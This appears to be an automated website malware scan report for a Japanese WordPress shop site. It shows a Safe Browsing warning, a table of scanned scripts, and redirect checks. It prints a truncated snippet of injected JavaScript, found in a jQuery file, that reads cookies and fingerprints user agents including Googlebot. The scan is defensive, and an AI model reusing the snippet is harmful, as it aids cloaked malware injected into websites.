Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shop.l-ri.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://shop.l-ri.com/ | 200 OK Content-Length: 8121 Content-Type: text/html | clean |
http://shop.l-ri.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96849 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8242 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t=void 0== Antivirus reports:
| ||
https://ajaxzip3.googlecode.com/svn/trunk/ajaxzip3/ajaxzip3-https.js | 200 OK Content-Length: 5354 Content-Type: text/plain | clean |
http://ajaxzip3.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://ajaxzip3.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://shop.l-ri.com//www.google.com/ | 200 OK Content-Length: 25193 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: l-ri.com ...[321 bytes skipped]... ã¢ã©ãã©ã¼ããå§ããæé ¸åï½ | 身ä½ãã¢ã«ã«ãªæ§ã«ä¿ã¤ãã¨ã§æ°é³ä»£è¬ãä¿é²ï¼ãç©èº«ãã»ãç¾èãã»ãè±å é½¢èããå®å ¨ããç®æãã¾ãã</title> <meta name="keywords" content="ãã¼ã¯ã¼ã1ãå ¥å,ãã¼ã¯ã¼ã2ãå ¥å" /> <meta name="description" content="è¦ç´ãå ¥åãã¦ãã ããã" /> <link rel="stylesheet" href="http://shop.l-ri.com/wp-content/themes/biyou_a2_twt/style.css" type="text/css" media="screen" /> <link rel="alternate" type="application/rss+xml" title="è¬å±æ¬èï½ã¢ã©ãã©ã¼ããå§ããæé ¸åï½ RSS Feed" href="http://shop.l-ri.com/?feed=rss2" /> <link rel="pingback" href="http://shop.l-ri.com/xmlrpc.php" /> <link rel='stylesheet' id='jetpack-subscriptions-css' href='http://shop.l-ri.com/wp-content/plugins/jetpack/modules/subscriptions/subscri ...[3297 bytes skipped]... | ||
http://shop.l-ri.com/wp-content/plugins/usc-e-shop/js/usces_cart.js | 200 OK Content-Length: 1342 Content-Type: application/x-javascript | clean |
http://static.evernote.com/noteit.js | 200 OK Content-Length: 63754 Content-Type: application/javascript | clean |
http://shop.l-ri.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/social/assets/social.js?ver=2.11 | 200 OK Content-Length: 15409 Content-Type: application/x-javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201440 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.0 | 200 OK Content-Length: 2001 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shop.l-ri.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 04:03:28 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/1oKhO>; rel=shortlink
Set-Cookie: uk4f2cada28dd90=7fdf6bbcf83f466a1d8354e2b7e8c2f5; path=/
X-Died: timeout at scan.pm line 1546.
X-Pingback: http://shop.l-ri.com/xmlrpc.php
X-Powered-By: PHP/5.3.15
GET / HTTP/1.1
Host: shop.l-ri.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 04:03:28 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/1oKhO>; rel=shortlink
Set-Cookie: uk4f2cada28dd90=7fdf6bbcf83f466a1d8354e2b7e8c2f5; path=/
X-Died: timeout at scan.pm line 1546.
X-Pingback: http://shop.l-ri.com/xmlrpc.php
X-Powered-By: PHP/5.3.15
Second query (visit from search engine):
GET / HTTP/1.1
Host: shop.l-ri.com
Referer: http://www.google.com/search?q=shop.l-ri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shop.l-ri.com
Referer: http://www.google.com/search?q=shop.l-ri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.